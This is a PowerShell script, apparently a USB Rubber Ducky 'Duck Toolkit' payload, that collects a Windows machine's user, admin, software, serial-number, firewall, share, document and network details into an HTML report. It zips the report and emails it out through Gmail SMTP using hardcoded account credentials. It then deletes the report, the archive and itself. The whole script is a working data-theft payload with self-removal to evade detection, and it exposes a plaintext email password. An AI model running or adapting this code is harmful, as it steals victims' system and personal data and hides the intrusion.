$folderDateTime = (get-date).ToString('d-M-y HHmmss')$userDir = (Get-ChildIt

1. $folderDateTime = (get-date).ToString('d-M-y HHmmss')
2.  
3. $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime
4.  
5. $fileSaveDir = New-Item ($userDir) -ItemType Directory
6.  
7. $date = get-date
8.  
9. $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>"
10.  
11. $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html'
12.  
13. $Report = $Report + "<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>"
14.  
15. $UserInfo = Get-WmiObject -class Win32_UserAccount -namespace root/CIMV2 | Where-Object {$_.Name -eq $env:UserName}| Select AccountType,SID,PasswordRequired
16.  
17. $UserType = $UserInfo.AccountType
18.  
19. $UserSid = $UserInfo.SID
20.  
21. $UserPass = $UserInfo.PasswordRequired
22.  
23. $IsAdmin = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] 'Administrator')
24.  
25. $Report = $Report + "<div id=left><h3>User Information</h3><br><table><tr><td>Current User Name:</td><td>$env:USERNAME</td></tr><tr><td>Account Type:</td><td> $UserType</td></tr><tr><td>User SID:</td><td>$UserSid</td></tr><tr><td>Account Domain:</td><td>$env:USERDOMAIN</td></tr><tr><td>Password Required:</td><td>$UserPass</td></tr><tr><td>Current User is Admin:</td><td>$IsAdmin</td></tr></table>"
26.  
27. $Report = $Report + '</div>'
28.  
29. $Report = $Report + '<div id=center><h3> Installed Programs</h3> '
30.  
31. $Report = $Report + (Get-WmiObject -class Win32_Product | ConvertTo-html Name, Version,InstallDate)
32.  
33. $Report = $Report + '</table></div>'
34.  
35. $u = 0
36.  
37. $allUsb = @(get-wmiobject win32_volume | select Name, Label, FreeSpace)
38.  
39. $Report = $Report + '<div id=right><h3>USB Devices</h3><table>'
40.  
41. do {
42.  
43. $gbUSB = [math]::truncate($allUsb[$u].FreeSpace / 1GB)
44.  
45. $Report = $Report + "<tr><td>Drive Name: </td><td> " + $allUsb[$u].Name + $allUsb[$u].Label + "</td><td>Free Space: </td><td>" + $gbUSB + "GB</td></tr>"
46.  
47. Write-Output $fullUSB
48.  
49. $u ++
50.  
51. } while ($u -lt $allUsb.Count)
52.  
53. $Report = $Report + '</table></div>'
54.  
55. $Report = $Report + '<div id=left><h3>Shared Drives/Devices</h3>'
56.  
57. $Report = $Report + (GET-WMIOBJECT Win32_Share | convertto-html Name, Description, Path)
58.  
59. $Report = $Report + '</div>'
60.  
61. $SysBootTime = Get-WmiObject Win32_OperatingSystem
62.  
63. $BootTime = $SysBootTime.ConvertToDateTime($SysBootTime.LastBootUpTime)| ConvertTo-Html datetime
64.  
65. $SysSerialNo = (Get-WmiObject -Class Win32_OperatingSystem -ComputerName $env:COMPUTERNAME)
66.  
67. $SerialNo = $SysSerialNo.SerialNumber
68.  
69. $SysInfo = Get-WmiObject -class Win32_ComputerSystem -namespace root/CIMV2 | Select Manufacturer,Model
70.  
71. $SysManufacturer = $SysInfo.Manufacturer
72.  
73. $SysModel = $SysInfo.Model
74.  
75. $OS = (Get-WmiObject Win32_OperatingSystem -computername $env:COMPUTERNAME ).caption
76.  
77. $disk = Get-WmiObject Win32_LogicalDisk -Filter "DeviceID='C:'"
78.  
79. $HD = [math]::truncate($disk.Size / 1GB)
80.  
81. $FreeSpace = [math]::truncate($disk.FreeSpace / 1GB)
82.  
83. $SysRam = Get-WmiObject -Class Win32_OperatingSystem -computername $env:COMPUTERNAME | Select TotalVisibleMemorySize
84.  
85. $Ram = [Math]::Round($SysRam.TotalVisibleMemorySize/1024KB)
86.  
87. $SysCpu = Get-WmiObject Win32_Processor | Select Name
88.  
89. $Cpu = $SysCpu.Name
90.  
91. $HardSerial = Get-WMIObject Win32_BIOS -Computer $env:COMPUTERNAME | select SerialNumber
92.  
93. $HardSerialNo = $HardSerial.SerialNumber
94.  
95. $SysCdDrive = Get-WmiObject Win32_CDROMDrive |select Name
96.  
97. $graphicsCard = gwmi win32_VideoController |select Name
98.  
99. $graphics = $graphicsCard.Name
100.  
101. $SysCdDrive = Get-WmiObject Win32_CDROMDrive |select -first 1
102.  
103. $DriveLetter = $CDDrive.Drive
104.  
105. $DriveName = $CDDrive.Caption
106.  
107. $Disk = $DriveLetter + '\' + $DriveName
108.  
109. $Firewall = New-Object -com HNetCfg.FwMgr
110.  
111. $FireProfile = $Firewall.LocalPolicy.CurrentProfile
112.  
113. $FireProfile = $FireProfile.FirewallEnabled
114.  
115. $Report = $Report + "<div id=left><h3>Computer Information</h3><br><table><tr><td>Operating System</td><td>$OS</td></tr><tr><td>OS Serial Number:</td><td>$SerialNo</td></tr><tr><td>Current User:</td><td>$env:USERNAME </td></tr><tr><td>System Uptime:</td><td>$BootTime</td></tr><tr><td>System Manufacturer:</td><td>$SysManufacturer</td></tr><tr><td>System Model:</td><td>$SysModel</td></tr><tr><td>Serial Number:</td><td>$HardSerialNo</td></tr><tr><td>Firewall is Active:</td><td>$FireProfile</td></tr></table></div><div id=right><h3>Hardware Information</h3><table><tr><td>Hardrive Size:</td><td>$HD GB</td></tr><tr><td>Hardrive Free Space:</td><td>$FreeSpace GB</td></tr><tr><td>System RAM:</td><td>$Ram GB</td></tr><tr><td>Processor:</td><td>$Cpu</td></tr><td>CD Drive:</td><td>$Disk</td></tr><tr><td>Graphics Card:</td><td>$graphics</td></tr></table></div>"
116.  
117. $Report = $Report + '<div id=center><h3>User Documents (doc,docx,pdf,rar)</h3>'
118.  
119. $Report = $Report + (Get-ChildItem -Path $userDir -Include *.doc, *.docx, *.pdf, *.zip, *.rar -Recurse |convertto-html Directory, Name, LastAccessTime)
120.  
121. $Report = $Report + '</div>'
122.  
123. $Report = $Report + '<div id=center><h3>Network Information</h3>'
124.  
125. $Report = $Report + (Get-WmiObject Win32_NetworkAdapterConfiguration -filter 'IPEnabled= True' | Select Description,DNSHostname, @{Name='IP Address ';Expression={$_.IPAddress}}, MACAddress | ConvertTo-Html)
126.  
127. $Report = $Report + '</table></div>'
128.  
129. $Report >> $fileSaveDir'/ComputerInfo.html'
130.  
131. function copy-ToZip($fileSaveDir){
132.  
133. $srcdir = $fileSaveDir
134.  
135. $zipFile = 'C:\Windows\Report.zip'
136.  
137. if(-not (test-path($zipFile))) {
138.  
139. set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18))
140.  
141. (dir $zipFile).IsReadOnly = $false}
142.  
143. $shellApplication = new-object -com shell.application
144.  
145. $zipPackage = $shellApplication.NameSpace($zipFile)
146.  
147. $files = Get-ChildItem -Path $srcdir
148.  
149. foreach($file in $files) {
150.  
151. $zipPackage.CopyHere($file.FullName)
152.  
153. while($zipPackage.Items().Item($file.name) -eq $null){
154.  
155. Start-sleep -seconds 1 }}}
156.  
157. copy-ToZip($fileSaveDir)
158.  
159. $SMTPServer = 'smtp.gmail.com'
160.  
161. $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
162.  
163. $SMTPInfo.EnableSsl = $true
164.  
165. $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('soussou.bahgat@gmail.com', 'oussama@89');
166.  
167. $ReportEmail = New-Object System.Net.Mail.MailMessage
168.  
169. $ReportEmail.From = 'katsumoto.lessis@gmail.com'
170.  
171. $ReportEmail.To.Add('katsumoto.lessis@gmail.com')
172.  
173. $ReportEmail.Subject = 'Duck Toolkit Recon Report'
174.  
175. $ReportEmail.Body = 'Please find attached your reconnaissance report.'
176.  
177. $ReportEmail.Attachments.Add('C:\Windows\Report.zip')
178.  
179. $SMTPInfo.Send($ReportEmail)
180.  
181. remove-item $fileSaveDir -recurse
182.  
183. remove-item 'C:\Windows\Report.zip'
184.  
185. Remove-Item $MyINvocation.InvocationName